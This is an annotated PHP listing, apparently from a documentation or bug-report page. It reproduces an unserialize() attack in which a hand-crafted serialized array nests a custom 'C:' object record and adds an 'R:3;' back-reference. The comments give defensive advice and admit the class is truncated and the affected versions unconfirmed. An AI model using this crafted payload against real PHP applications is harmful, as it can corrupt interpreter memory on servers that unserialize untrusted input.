- var_dump: documentation (source)
- unserialize: documentation (source)
- serialize: documentation (source)
<?php
/**
 * Minimal test class for the unserialize() reproducer in this listing.
 *
 * Implementing Serializable makes PHP use the custom-serialization record
 * format (`C:`) for instances of this class. The interface requires
 * serialize() and unserialize($data) methods; none are visible here, so the
 * class body appears to be truncated and PHP would reject the declaration as
 * shown.
 *
 * NOTE(review): Serializable is deprecated as of PHP 8.1 in favour of
 * __serialize()/__unserialize().
 */
class obj implements Serializable
{
// Public property; the script assigns 1 to it before serializing.
public $data;
}
// Reproducer: builds a serialized payload by hand and feeds it to unserialize().
// Defensive takeaway: unserialize() must never receive bytes an untrusted party
// can influence. The allowed_classes option restricts which classes are
// instantiated, but it does not protect the parser itself from malformed
// records; use json_decode() for untrusted data.
$object = new obj();
$object->data = 1;
// Whatever serialize() returns for the obj instance is embedded in the payload below.
$inner = serialize($object);
// Hand-written serialized array with two elements:
//   i:0 => C:3:"obj":<len>:{...}  custom-serialized obj record wrapping $inner
//   i:1 => R:3;                    reference to a previously parsed value (slot 3)
// strlen() keeps the declared byte length consistent with $inner.
// NOTE(review): which value slot 3 resolves to depends on how unserialize()
// numbers values inside the C: payload; the page does not state which PHP
// versions are affected, so confirm before relying on this listing.
$exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner . '}i:1;R:3;}';
// Parsing the crafted string is the step under test.
$data = unserialize($exploit);
// Dump the result so the value behind the reference in element 1 can be inspected.
var_dump($data);